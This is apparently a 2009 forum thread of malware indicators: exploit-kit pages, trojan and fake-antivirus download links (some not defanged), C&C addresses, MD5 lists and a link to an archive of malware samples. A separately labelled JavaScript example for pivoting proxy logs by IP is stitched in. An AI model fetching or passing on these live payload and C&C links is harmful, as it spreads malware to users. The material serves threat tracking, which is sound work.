hxxp://dcz9ubei212vp3nrca5i.cn/s_t.php
hxxp://znchygdrmelzejjvofji.cn/s_t.php
hxxp://virevpcklvlrxjcqxtij.cn/s_t.php
hxxp://xbfnyukgdoqrjrsfmcdm.cn/s_t.php
hxxp://qjiv7qj4irh2f1o2v8sm.cn/s_t.php
hxxp://1zs0ewvqcget52rl1z1n.cn/s_t.php
hxxp://lufwhtelkadvrtaukqjo.cn/s_t.php
hxxp://ddvrrflabpqcuoaexpwp.cn/s_t.php
hxxp://lmempodfzrqqkteyupar.cn/s_t.php
hxxp://zjjrrhhuokjxgmulisxs.cn/s_t.php
hxxp://tckeblkiumuhysrwqlev.cn/s_t.php
hxxp://egntxselsaossawilurx.cn/s_t.php
hxxp://hsyzpbavkojdqclhnoqz.cn/s_t.php
==================
hxxp://msvcp70.biz/e514.gif
hxxp://msvcp70.biz/e536.gif
hxxp://msvcp70.biz/e509.gif
hxxp://msvcp50.biz/e514.gif
hxxp://msvcp50.biz/e536.gif
hxxp://msvcp50.biz/e509.gif
hxxp://yourguardon.com/
Iframes to goshak.biz listed earlier...
==================
ftp> open 122.224.9.221
Connected to 122.224.9.221.
............
Here's the rest of domains there... :)
http://www.bfk.de/bfk_dnslogger.html?query=122.224.9.221#result
hxxp://wllvvkjknh.cn/md/index.php
hxxp://woqyymmptn.cn/md/index.php
hxxp://ozimzikjun.cn/md/index.php
hxxp://zusojbktvo.cn/md/index.php
hxxp://enjnzdfmts.cn/md/index.php
hxxp://fxlbubmkfs.cn/md/index.php
hxxp://pxciiruurw.cn/md/index.php
As for the one not listed above, miss-office-2009.com namely...
seems we've got a pretty hardcore spammer here, so... let's vote for him ;-)
http://www.google.com/search?q=miss-office-2009.com
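The posts above pivot by hand: take one hosting address (220.196.59.26, 122.224.9.221), enumerate the other domains resolving there, and find that they all serve the same kit path (`/s_t.php`, `/md/index.php`). The block below is an added example, not from the thread, that does the same pivot over a batch of `URL DIRECT/IP` lines (the Squid-style access-log form quoted later in this thread) and also runs the reverse pivot, one domain seen behind several addresses. Every host and address in `SAMPLE_LOG` is a constructed placeholder from the reserved example ranges, and the function names are mine.

```javascript
// Added example (not from the thread): pivot a batch of observed malicious URLs
// on their hosting address, which is what the posts above do by hand for
// 220.196.59.x and 122.224.9.221. Input lines are "URL DIRECT/IP" pairs, the
// Squid-style access-log form quoted later in this thread. All hosts and
// addresses in SAMPLE_LOG are constructed placeholders (reserved example ranges).

const SAMPLE_LOG = [
  "hxxp://aaaa.example/s_t.php DIRECT/198.51.100.17",
  "hxxp://bbbb.example/s_t.php DIRECT/198.51.100.17",
  "hxxp://cccc.example/s_t.php?x=1 DIRECT/198.51.100.17",
  "hxxp://dddd.example/md/index.php DIRECT/203.0.113.221",
  "hxxp://eeee.example/md/index.php DIRECT/203.0.113.221",
  "hxxp://ffff.example/cache/readme.pdf DIRECT/192.0.2.151",
  "hxxp://ffff.example/cache/readme.pdf DIRECT/192.0.2.152", // same host, new address
  "not a log line",
].join("\n");

// Accepts http/https and the defanged hxxp/hxxps spellings; captures host, path
// (query string dropped) and the resolved address after "DIRECT/".
const LINE_RE = /^h[tx]{2}ps?:\/\/([^\/\s?#]+)([^\s?#]*)\S*\s+DIRECT\/(\d{1,3}(?:\.\d{1,3}){3})$/i;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  return m ? { host: m[1].toLowerCase(), path: m[2] || "/", ip: m[3] } : null;
}

function parseLog(text) {
  return text.split(/\r?\n/).map(parseLine).filter((r) => r !== null);
}

// address -> { hosts, paths }: which domains and which URL paths sit behind it.
function pivotByIp(records) {
  const byIp = new Map();
  for (const r of records) {
    if (!byIp.has(r.ip)) byIp.set(r.ip, { hosts: new Set(), paths: new Set() });
    const entry = byIp.get(r.ip);
    entry.hosts.add(r.host);
    entry.paths.add(r.path);
  }
  return byIp;
}

// Addresses where at least minHosts distinct domains all serve one identical
// path: the signature of one exploit kit behind many throwaway domains.
function sharedKitHosts(records, minHosts = 2) {
  const hits = [];
  for (const [ip, entry] of pivotByIp(records)) {
    if (entry.hosts.size >= minHosts && entry.paths.size === 1) {
      hits.push({ ip, path: [...entry.paths][0], hosts: [...entry.hosts].sort() });
    }
  }
  return hits.sort((a, b) => b.hosts.length - a.hosts.length || a.ip.localeCompare(b.ip));
}

// The reverse pivot: one domain seen behind several addresses, which is what a
// re-hosted or fast-flux site looks like in the same data.
function multiHomedHosts(records) {
  const byHost = new Map();
  for (const r of records) {
    if (!byHost.has(r.host)) byHost.set(r.host, new Set());
    byHost.get(r.host).add(r.ip);
  }
  return [...byHost]
    .filter(([, ips]) => ips.size > 1)
    .map(([host, ips]) => ({ host, ips: [...ips].sort() }));
}

// Run both pivots over the constructed sample.
function analyseSample() {
  const records = parseLog(SAMPLE_LOG);
  return { records, kits: sharedKitHosts(records), moved: multiHomedHosts(records) };
}
```

On the sample, `analyseSample()` reports two kit addresses (three domains behind `/s_t.php`, two behind `/md/index.php`) and one domain that moved between addresses. The query string is dropped before grouping so that per-visitor parameters such as `?id=...` do not split one kit path into many; the requirement that an address serve exactly one path is deliberately strict, and a busy shared host with several unrelated kits would need `paths.size` relaxed to a small bound.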
-
Regarding the PDF at hxxp://sh-hostz9.net/1/index.php, they must have something wrong in their scripts:
?>?>?><b>FPDF error:</b> Some data has already been output, can't send PDF file
Yeah, that's what I was talking about, kept getting this error, though in the end it did redirect me to the other iframe there at vparivatel.php
-
exploits/trojan
www.besplatnoe-porno.info/downloads/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=937bb224a8eb2fd48d1d812a867c9623&t=1239190412&type=js
http://www.virustotal.com/analisis/99a1a9d2003b23212842cd22ee90c129 3/40
-
exploits
m.winxyz.com
http://wepawet.iseclab.org/view.php?hash=d66445fca10663d693af2f98cd2d398c&t=1239171377&type=js
http://winxyz.com/win/j.exe
http://www.virustotal.com/analisis/ce445dadf7062fd70787035dbca77edf 13/40
http://winzxm.com/win/u.exe
http://www.virustotal.com/analisis/e06dfabe4a1a7fabf065604678b24b9c 11/39
-
TDSS variant:
http://www.virustotal.com/analisis/f24fe6a2671b58376efafef6b068254c
hxxp://traffbox.com/in.cgi?6
hxxp://goscandata.com/?uid=12404
hxxp://scan7live.com/?uid=12404
hxxp://scan7live.com/download/install.php
Koobface variant:
http://www.virustotal.com/analisis/0d66a352aa6c6f7579fae43a1aba4c15
hxxp://traffbox.com/in.cgi?3
hxxp://hqviewworldmy1.com/view/1/1222/1/2
hxxp://hqviewworldmy1.com/download/1/1222/1/2
hxxp://hqviewworldmy1.com/software/c2fb59fa16/12221/1/2.exe
Notice that traffbox.com above redirects either to TDSS or Koobface, depending on the parameters passed...
Now, same type of Koobface variant as above, different hash though:
http://www.virustotal.com/analisis/2104a7d2b8c8a3fd2f84128d90c84fe9
hxxp://hqviewworldmy1.com/software/c2fb59fa16/10005/1/Setup.exe
========================
hxxp://welovesandi.com/?cmpid=
hxxp://crustat.com/ts/in.cgi?gen&se=oth&ur=1&hxxp_REFERER=wel-cmpid%3D
hxxp://www.scanspywareonline.com/online-scan.html?ewmid=231&pwebmid=gen&rejurl=hxxp://pnfzetnax.net/asw/gen/
hxxp://pnfzetnax.net/asw/gen/
hxxp://truconv.com/?a=125&s=gen-asw
hxxp://top-name.cn/in.cgi?default&a=ks125&s=gen-asw
hxxp://total-virusprotection.com/xpprot/7/?a=ks125&s=gen-asw&z=
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe
--->
hxxp://setup.total-virusprotection.com/ -> Open dir... ;-)
--->
The executables there... (md5 dupes not listed)
hxxp://setup.total-virusprotection.com/total-malwareprotection.com/1.0.11.0/updatexpvps.exe
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe.1
hxxp://setup.total-virusprotection.com/setupfiles/totalvirusprotectionp.exe
hxxp://setup.total-virusprotection.com/secure/b4b8fee44a494ff05f405da47d3dd5b3/49dd5a25/setupfiles/totalvirusprotections.exe
Play around with crustat.com's parameters above, it generates numerous nifty links...
========================
Plus another open dir with fake AVs...have fun:
hxxp://download.pcantimalwaresolution.com/
hxxp://offer-provider.com/srm/adv/142/
hxxp://dwnld.offer-provider.com/secure/940907dc34c7bed5e75f1e517b2b3a42/49dd612d/srm/srm_free_setup.exe
hxxp://infracleaner.in/download.php?affid=02935
hxxp://onlinebrandsecurity.com/download.php?affid=17503
-
Direct link to the executable in dwnld.offer-provider.com above, seems to have changed since yesterday...
hxxp://dwnld.offer-provider.com/secure/85f2be819efd8db13b4fab89c8a1d2db/49dde7f1/srm/srm_free_setup.exe
Plus, it's an open dir, for the time being...
hxxp://dwnld.offer-provider.com/
36 unique .exes there - here are the md5 checksums...
0651b7a4652b62c9bb74493c7440063d
2a5e21896b3043558a44f578a3b4cfea
2f590df32718d03c1c2a8fbeec715cac
2f7a9243cf4179157e382c39b1b8d1ef
31111c18393fcc7a08f7992aedc750ec
3228f756e74b05325beec3c6beeb2dea
3345b80c425dc6affe139ace94fee877
347271c8d9dc43d19b6c96708da08546
4795a9ae8a745c954f7a49944b8383a8
5a9087a4ef2dbf7f9e5a98226e94d8ff
5fb2e122b013aaf49f53502fd137e868
6737ff1d0c98962b515875283458095d
6890de6ce038b5d591aa14533a55292e
75b367bd2754b7dabfe2d1fd9bed789f
7a0051905effe054878aff73e4d01625
84f37f3f8f5434b8e6dad753bea717e9
8cfa3151df73debd3cb9b1bde978239c
9523d691f47fb8eb2457d2dbb3baed29
991c4f16c2f6fdb1712fccb573f6bfaa
9a8ecb72c0ca39145e0a6913f029abad
9b584cad38175a050bcd50805b12417e
a40e8cb47af24ef91023d4c078ad77ac
af862463f039fdc8b53e06406de73e67
b1705495d54f8c8f2f283c4886efb081
bb734c355149c3eed3389d309ea13fb1
c3328da0fa70305efeca816d735fca01
c3ef149dcfc5b3ca9da2578921de0007
c4a362df8a92650f6af41de9c733019a
c96bab9c4c7838b5eab3462e34ad8ec1
d7edd052b5363c57777addb72e8ae47c
d889b0e868832fd4ee7ba868656a6827
d9195a978f8cf2ba213471f4d3f484c3
dd18136c665be386bd02476e523df04e
e9cfd70907cf607b6fe7e92557989e20
f0afe3b1d0d4536cede447ea59053071
feed65765e05fcf542ff797147a88f8f
Here they are archived in .7z format ...78mb approximately:
http://www.megaupload.com/?d=Y33LVTZH
-
Rogue:
scanner.rapid-antivir-2009.com/35/?advid=1694&ref=0&p=1000000000
soft-traffic.com
Redirect to rogue:
rd-point.net/go.php?id=1188
Exploit/trojan:
http://projectns.biz/sploits/pdf.php?id=2
http://wepawet.iseclab.org/view.php?hash=46aa9abb1ac32cdd3134f0230694fc1b&t=1239188557&type=js
Exploit/trojan:
vas4k.cn/pabl/
http://wepawet.iseclab.org/view.php?hash=f39bbd62bab727dc7c075547dd3df249&t=1239191102&type=js
trojan:
http://secondgate.ru/77/load.php?id=2
http://www.virustotal.com/analisis/4c5fd3e65565e2b33c68c855a58de0ca
trojan:
http://bankitrade.com/exp/l.php?b=2&s=djdak
http://www.virustotal.com/analisis/7070fe304677bbda85dfd8a6970ab46f
-
pdf/flash exploit
x.lousecn.cn
http://wepawet.cs.ucsb.edu/view.php?hash=bc0b5c2d562ee175849da928de2727b4&t=1239369858&type=js
http://x.lousecn.cn/load.php?id=2
http://virscan.org/report/b0abe06d8536b4abe35c6beb9079a5b6.html 4/37
-
msn-gallery.us/f.jpg
http://virscan.org/report/6735f8decd6ffb129052f297220957c3.html 0/37
-
C&C server:
hxxp://moneystyle.com.cn/bmngr/controller.php?action=bot&entity_list=
hxxp://www.new-mrcash.net/images/x_01.jpg
Seems like a failed attempt at using Thinstall to me, anyway...
http://anubis.iseclab.org/?action=result&task_id=13ee47e6969787c64dd38f52f3e9842ee&format=html
http://www.virustotal.com/analisis/34a6262329fda4fb398c57de90201a7a
hxxp://www.new-mrcash.net/images/win_04.jpg
http://www.virustotal.com/analisis/b188a358f58d5b8a0074f81fc79a0f25
-
Exploit
http://67.215.246.139/a12/index.php
http://67.215.246.140/a12/index.php
http://67.215.246.141/a12/index.php
http://67.215.246.142/a12/index.php
-
all lead to
trojan Hiloti
67.215.246.138/a12/aff_12.exe?u=i_7_0&spl=4
http://virscan.org/report/e01f5e00ab1a5916117edaf06bdfd4f1.html 4/37
-
Found the whole list, not sure if some of them are already included or not.
hxxp://193.138.172.15/salo/?16de305069114a106409128eb3bb985b8d4d98674d1376589cbccfd886874a6072e088f250fa24f1270c05764cfe398e75b8936c7cd308dcfab00d2d5beafff0 DIRECT/193.138.172.15
hxxp://193.138.172.15/salo/?27a2f14df1d2659997c6434cebe6df547dff29131b9812ee9e49a3402a2c9a0cd6fc3e067512f7802e3b072473443089755efbe378162268855fb15dd41ddd1b DIRECT/193.138.172.15
hxxp://193.200.255.19/%7Etimchenko/cms/cache/readme.pdf DIRECT/193.200.255.19
hxxp://194.165.5.20/sp/7.pdf DIRECT/194.165.5.20
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/210.83.85.100
hxxp://1st.abdulabah.cn/cache/readme.pdf DIRECT/213.182.197.229
hxxp://202.73.57.6/tomi/?1643bf49f40997de68d1f717b843a34e44612930cf3f24bc08ef9b738eb345962032326f97041b59e6df8f3d76d59a24c4f6a58f05e382fdab2fd26adc9ff32e DIRECT/202.73.57.6
hxxp://78.129.166.5/%7Exqz/sp/include/spl.php?stat=Windows%20XP%7CInternet%20Explorer%206.0%7CFR%7C82.123.93.80 DIRECT/78.129.166.5
hxxp://7ioi.biz/fo/spl/pdf.pdf DIRECT/213.182.197.236
hxxp://94.247.2.122/us.pdf DIRECT/94.247.2.122
hxxp://94.247.2.195/news/?id=2 DIRECT/94.247.2.195
hxxp://96.0.13.1/jms/sploits/test.pdf DIRECT/96.0.13.1
All of the above are PDF/Java exploits.
-
Found the whole list; not sure if some of them are already included or not.
Most of those URLs have already been on the list.
It looks like Malekal's exploit list.
-
193.111.244.21
Exploit (util.printf) - Wepawet (http://wepawet.iseclab.org/view.php?hash=11d02f5e15a36bdf8ff9a7f8779b5929&t=1239491654&type=js)
hxxp://onlinepharmacy4you.org/65/iepdf.php?f=new
Trojan
hxxp://onlinepharmacy4you.org/65/load.php
hxxp://www.kandidatov.net/1/p.exe
VirusTotal (http://www.virustotal.com/analisis/037af797be509dc3da1380fdf34df1c5) 35/40 (87.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1b3cce6a0deb513e4fdc83a2990e917ce)
-
Zbot
finik.us/live/load.php?e=1
http://www.virustotal.com/analisis/f081994ac023069ebe47ddd949adc743
Rogue:
http://www.chorussoft.com/install.exe
http://www.virustotal.com/analisis/a06a11e5549f88f483d564c2582ccc97
This IP is full of rogue:
http://www.bfk.de/bfk_dnslogger_en.html?query=64.191.12.38#result
The ones that aren't in MDL:
ms-antispyware2009.com
pro-antispyware2009.com
http://files.load-antivir-pro-pc.com/release/setup.exe
totalantispyware2009.com
totalantispyware.com
system-cleanerpro.com
syscleanerpro.com
totalantispyware.net
Other rogue:
http://ugh-softwares.com/promo.exe
http://gdfshgfh.com/promo.exe
http://uniquexporn.com/promo.exe
http://www.virustotal.com/analisis/14a94fb9a291d16fbbade9a078d67846
http://bonuspromooffer.com/srm/adv/142/?a=cspsant1p&l=273&f=cs_7175823974&ex=&ed=&sub=&prodabbr=USRM
-
Exploit:
http://niggerok.com/fafa/index.php
http://wepawet.iseclab.org/view.php?hash=84b34a34e05a7d00fe9198ae4d2d5424&t=1239555288&type=js
http://expfanclub.com/lom/index.php
http://wepawet.iseclab.org/view.php?hash=b410ff492fbd79ddfae0c102b7792993&t=1239555215&type=js
http://seofucking.com/vavilon/
http://wepawet.iseclab.org/view.php?hash=9d3ad64e279e1692d7490f208600c233&t=1239555455&type=js
-
The last one, which leads to http://seofucking.com/vavilon/load.php, is the Ambler trojan.
-
195.88.80.41
hxxp://slk-downloads.com/promo.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/73c3f615c00dcc5718e7b6279fa0961a) 7/40 (17.5%)
76.73.21.186
config:
http://76.73.21.186/ldr/loadList.php?version=1
files:
hxxp://76.73.21.186/ldr/dl/zchMiB.exe
hxxp://76.73.21.186/ldr/dl/part.exe
hxxp://76.73.21.186/ldr/dl/minisvr4.exe (not found)
hxxp://76.73.21.186/ldr/dl/clkw.exe
hxxp://76.73.21.186/ldr/dl/websvr.exe
VirusTotal results:
zchMiB.exe - Trojan Autoit (http://www.virustotal.com/analisis/99e6d74df3bc3be73509bdfbe62aa4dc) 21/39 (53.85%)
part.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 21/40 (52.5%)
clkw.exe - Trojan Autoit (http://www.virustotal.com/analisis/85daff7fe1ee66559bda58efea4f4d90) 13/40 (32.50%)
websvr.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 10/40 (25%)
-
194.165.4.77
hxxp://loyal-porno.com/scan/?
hxxp://loyal-porno.com/tube/?
hxxp://loyal-porno.com/codec.exe
1) Fake Scanner Page
2) Fake Codec Page
3) Trojan
VirusTotal (http://www.virustotal.com/analisis/dfde556533497ac71d555742d6d6f741) 7/40 (17.5%)
-
91.212.41.119
hxxp://tixwagoq.cn/in.cgi?6
Redirects to exploit:
91.212.41.119
hxxp://paylayos.cn/nuc/index.php
which loads
hxxp://paylayos.cn/nuc/exe.php
then loads the flash exploit
hxxp://paylayos.cn/nuc/spl/pdf.pdf
to finally load the executable
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/823401c2f51007764b713f0894342507) 8/40 (20.00%)
Redirection Analysis: Wepawet (http://wepawet.iseclab.org/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&t=1239621305&type=js)
-
other links for "best-click-av1.info"
http://download.best-click-av1.info/install.php?campaign=mmb_227523872&country=en&counter=4&campaign=mmb_227523872&landid=4
http://download.best-click-av1.info/en/PE/N1.CAB
http://download.best-click-av1.info/en/PE/QWProtect.dll
http://download.best-click-av1.info/en/PE/svchost.exe
VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/05357372ad0d72bf7fbb682e49f05539) 33/40 (82.5%)
VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/8a46dd8ec034177dc10243b33ba3fd1b) 11/39 (28.21%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/4e4aa550f799e703a19bff8939c14d56) 25/38 (65.79%)
VirusTotal: Trojan FakeAlert (http://www.virustotal.com/analisis/cc494b775cbce5316563c216335d1fc3) 28/38 (73.68%)
-
Sites related to Vxgame Trojan
http://onlinescanxp.com/?a=conf&code=502
antivirusxppro-2009.com
5-renus2008.com
http://free-web-scaners.biz/scan/?code=435
-
hxxp://w1.akc8.com/01/s.exe
hxxp://w1.ys8c.com/01/s.exe
hxxp://down.zhibo8.com/soft/spvod.exe
-
fake AV
http://lj3q.biz/av.26.0.exe
http://www.virustotal.com/analisis/b79cb1ea34600095ce75b3fccbfa5af3
http://megsw.com/av.26.0.exe
http://www.virustotal.com/analisis/d027aec77ed8c403b77c0b5b92e1ab97
Fake AV loader
http://www.trart.net/vildanezik.net/album/default.exe
http://www.virustotal.com/analisis/14dbac952360d7d0672e372a75e9177b
http://porntubevidz.com/14.exe
http://www.virustotal.com/analisis/fc537777547fbeb743764d71e97edf4f
Trojan
http://216.195.58.114:35813/getLoader.php?p=1zHniWUaKiCQt
http://www.virustotal.com/analisis/41394ae810a5b070c6a4a48f664a75b5
Trojan
http://totalmic.if.ua/ftp2.exe
http://www.virustotal.com/analisis/049e37d45db1e083ce5c3def69aac306
Trojan
http://banksguard.com/pics/ncr.exe
http://www.virustotal.com/analisis/58dcebabde517dd1c0e38257b43a9e62
Trojan
http://auf-jeder.com/123.exe
http://www.virustotal.com/analisis/55f110a5dd1d46d6d29bcab867dd123c
-
Sites related to Rogue security applications
system-cleaner.net/load/setup.msi
tantispyware.com/load/setup.msi
webantispy.com/load/setup.msi
pantispyware09.com/dwn/setup.exe
-
hxxp://usrv03.ru/index.php?x=1
hxxp://usrv03.ru/pdf_1.php?id=3304
http://wepawet.iseclab.org/view.php?hash=fcb37c12aa47d8d4911a81e3d9749c95&t=1239735089&type=js
http://anubis.iseclab.org/?action=result&task_id=1ec2e01cf8ff3f72431c9490b047d70ef&format=html
-
http://antivirusxp09.com/img/
http://antivirusxp09.com/new/index.php
http://antivirusxp09.com/new2/index.php
http://antivirusxp09.com/new3/index.php
http://wepawet.iseclab.org/view.php?hash=1502f37ba459292fae9c5cffd524c714&t=1239736282&type=js
http://anubis.iseclab.org/?action=result&task_id=1f6f85e9801c0bf942dd45076c2ebac87
http://www.virustotal.com/analisis/5aca8d47cc3b7b20cb77529cede96a6a
-
Rogue Fake AV
hxxp://star4scan.com
hxxp://scan6easy.com
hxxp://scan6fast.com
hxxp://lux4scan.com
hxxp://luxscan4.com
hxxp://msscanner-files-av.com/200109/scan/
-
Trojan:
79.174.64.13/out.exe
http://www.virustotal.com/analisis/7bca934bb8e377eebe4edebfebf8523a
Trojan:
mal-waredoc.com/load.php?id=2
http://www.virustotal.com/analisis/11576255e0680454c54efa2766cc9435
Trojan
s0si.ru/TT/load.php
http://www.virustotal.com/analisis/a4a966837adda2c3cc34d981c93d93e6
Trojan:
tradepark.info/photos/load.php
http://www.virustotal.com/analisis/17a9c3d18044191a539072b82821e766
Trojan:
95.129.144.186/gf/ma.exe
http://www.virustotal.com/analisis/5e2316512208bcc9e0b38856182c39b1
Fake AV:
95.129.144.186/gf/swp.exe
http://www.virustotal.com/analisis/d05a9eb3e36e93f5fbe35d9375892596
Rogue:
spy-wareprotector2009.com
-
kroto.biz/myy/index.php
kroto.biz/myy/cache/readme.pdf
kroto.biz/myy/cache/flash.swf
kroto.biz/myy/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=ba0ba1b23890b2b70125f744960bd863&t=1239788253&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40
kroto.biz/myy/index.php
kroto.biz/ins/cache/readme.pdf
kroto.biz/ins/cache/flash.swf
kroto.biz/ins/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=e7fd2ee3c218c66ad961163569df5dca&t=1239788768&type=js
http://www.virustotal.com/analisis/1176e423edaf89cf29ca7299fac7eefd 0/40
kroto.biz/opi/index.php
kroto.biz/opi/cache/readme.pdf
kroto.biz/opi/cache/flash.swf
kroto.biz/opi/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=a21882d077d3295aa223d46ef0e61158&t=1239788777&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40
-
Redirector, play with the number:
cjtrader.biz/in.php?s=1
Redirects to fake AV:
tdncgo2009.com/?uid=36&pid=3
Fake AV
http://virussweeper-scanvirus.net/?p=nqd2a16poZ2eYJqMoKNqq6iQtFPEmZSjj8KqqVeYlJjXnrmMiXl%2BhIo%3D
vswpr.googlecode.com/svn/trunk/ReleaseXP.exe
http://www.virustotal.com/de/analisis/29d5d657b1b1e9b49b7ba3ca26f76fbe 2/40
-
All rogue
-
Posted to:
http://bbs.vc52.cn/redirect.php?tid=82103
-
gogo sysadm ;D
-
Trojan Webmoner
wiz2wix.com/out.exe
http://www.virustotal.com/analisis/b4c3c35969ab9091652570b7bb8f83ae
Ftp Stealer
tayforlive.ru/ftp_G.exe
http://www.virustotal.com/analisis/978f0644b6375647f10d3043123aa537
Trojan:
ftpgeoit.com/exe/9sys270.exe
http://www.virustotal.com/analisis/bdaf84af42d6fe1c146ae4a68479674b
Trojan:
ftpgeoit.com/exe/gld.exe
http://www.virustotal.com/analisis/2813968773754764f195f9abc458672a
Trojan:
ftpgeoit.com/exe/lich.exe
http://www.virustotal.com/analisis/a3d56941a5206226d019d76071f9c354
Exploits/trojan:
homesy.net/mu/index.php
http://wepawet.iseclab.org/view.php?hash=943da6e620aeb897e9586e68771d1467&t=1239861325&type=js
Redirect to rogue:
Blogtransaction.cn/in.cgi?9
Bankinggolf.cn/in.cgi?9
Acousticnail.cn/in.cgi?9
ay.goldrushclub.cn/in.cgi?9
All redirect to
1000league.com/in.cgi?9
(which is on MDL)
http://wepawet.cs.ucsb.edu/view.php?hash=a67a5af0914956eaf26cb260d4632a3e&t=1239830585&type=js
Then to Rogue:
msscan-files-antivir.com/200109/scan/
-
Here's a nifty PDF exploit...
hxxp://d0lphin.biz/max/in.php
Result: 4/40 (10%)
http://www.virustotal.com/analisis/de6f75f3c03f508662872923ff3c73bb
Here's what it returns for the time being...
http://wepawet.iseclab.org/view.php?hash=5edd49ee3561911ff34c53abade513a6&type=js
Result: 12/40 (30.00%)
http://www.virustotal.com/analisis/4e8ce4cab8a08a7754395eaf6192ce3a
Now go dig on the rest of domains there...
http://www.robtex.com/ip/210.83.85.94.html
===========================
hxxp://megapupseg.ru/xtrm/index.php
hxxp://www.murka-best.com/index.php?sall=miks_ind
===========================
hxxp://team-sleep.by.ru/menu.html
hxxp://bizoplata.ru/pay.html?
hxxp://bizoplata.ru/courier.html
hxxp://5rublei.com/unique/index.php
hxxp://bizoplata.ru/mortgage.html
hxxp://myrurrly.com/in.cgi?pipka3S
hxxp://tixwagoq.cn/in.cgi?4
hxxp://tochtonenado.com/yes/index.php
hxxp://paylayos.cn/nuc/index.php
hxxp://mixbunch.cn/thread.html
hxxp://mixbunch.cn/belt.html
hxxp://mixbunch.cn/scarf.html
http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&t=1239885967&type=js
===========================
hxxp://startdontstop.ru/bigmac.html
hxxp://tixwagoq.cn/in.cgi?4
hxxp://paylayos.cn/nuc/index.php
-
http://www.webpresence4u.co.uk/forms/use/email/POSTALESAMORPORSIEMPRE.php
http://www.virustotal.com/analisis/a57dbbe538cbe01a060e27c60e0ff2a0
http://www.threatexpert.com/report.aspx?md5=ba19812a5c24c50bb7480d55e2e081ca
corresponding irc c&c
cnz0k3r.cdmon.org:6667
-
Exploit which leads to Pinch trojan:
counnter.cn/z/count.php?o=1
http://wepawet.iseclab.org/view.php?hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253&type=js
The pinch trojan:
counnter.cn/z/getexe.exe?o=1&t=1239892251&i=2057619350&e=1
http://www.virustotal.com/analisis/da79eef38206c2e643777c17191ea4a8
Exploit/trojan:
teenagersporn.net/project2/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bad316b7e10f1195eda2adf0c3da0a49&t=1239918254&type=js
Exploit/trojan:
google-advisior.cn/project2/index.php
http://wepawet.iseclab.org/view.php?hash=535c6efb84e00f72ff3f5ecf9aca3df5&t=1239870763&type=js
Exploit/trojan:
hackzona.info/s/index.php
http://wepawet.iseclab.org/view.php?hash=dcac90e453678bee26d187e37474d291&t=1239872153&type=js
Pdf exploit/trojan:
http://liteautogreatest.cn/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=2030ec9e4312994722b9a2037911d8dc&t=1239819716&type=js
Domain listed on MDL but in a different directory
d0lphin.biz/mix/pdf.php
http://wepawet.iseclab.org/view.php?hash=5e69487565b54590dc4521945162dbe7&t=1239873022&type=js
Redirects to rogue:
sotoviy.info/0/go.php?sid=2
uouo.info/0/go.php?sid=2
leshik.info/0/go.php?sid=2
wazo.info/0/go.php?sid=2
lavo.info/0/go.php?sid=2
reliable-anti-virus.info/0/go.php?sid=2
webportal-sms.info/0/go.php?sid=2
spyware-guard.info/0/go.php?sid=2
spyware-soft.info/0/go.php?sid=2
spyware-security.info//0/go.php?sid=2
all redirect to online scan:
loyal-porno.com/scan/?id=260
-
www.catch-you.ru/files/winsetup66.exe
http://www.virustotal.com/analisis/e63c9ea8320708d2dd2e705f6bf73da6 8/40
http://www.threatexpert.com/report.aspx?md5=6c05f6bd103d84523d6aea9d19b3f2cd
www.catch-you.ru/files/wingo.exe
http://www.virustotal.com/analisis/eb2b1f73f0f3ace4a8243aa46845cc91 18/40
www.catch-you.ru/files/ftp_non_crp.exe
http://www.virustotal.com/analisis/acd15fdd1fa850b4a0d162ebde7dadf2 35/40
www.catch-you.ru/files/ru12.exe
http://www.virustotal.com/de/analisis/a74d38aa72e78450b2eb46a299a72b8a 2/39
www.catch-you.ru/files/jnk.exe
http://www.virustotal.com/analisis/bf082a8a4632ea8d382d3fb756713b2a 13/39
www.catch-you.ru/files/pac2.exe
http://www.virustotal.com/analisis/5cc7f9b74b036bd4dc4975035711fd28 10/37
www.catch-you.ru/files/Winset20.exe
http://www.virustotal.com/analisis/f46ca5e54daa7244a134623b968c74b8 5/40
http://www.threatexpert.com/report.aspx?md5=b88e83a2fc5d229f0a3ed5e790c395e1
www.catch-you.ru/files/1000.exe
http://www.virustotal.com/analisis/02a62655684eb0bdeb9acd9a23deb80f 17/39
-
Exploit:
hxxp://beebest.cn/dlutrl23dnwfas/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=8c979b2883f0cf92419a4b342fff4545&t=1240050576&type=js)
PDF:
hxxp://beebest.cn/dlutrl23dnwfas/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&t=1240050583&type=js)
VirusTotal (http://www.virustotal.com/analisis/c6e2fe3fbaf95d5730763c3f4d819808) - 10/40 (25%)
Exe:
hxxp://beebest.cn/dlutrl23dnwfas/exe.php
VirusTotal (http://www.virustotal.com/analisis/e215d34b9667869918886503a1233011) - 7/40 (17.5%)
-
AV Antispyware rogue related sites
http://int.reporting32.com/stat.php?func=installrun&id=200002&landing=-1&lang=EN&sub=0
http://dl.scan-antispy-4pc.com/get/?pin=0&lnd=0&type=main
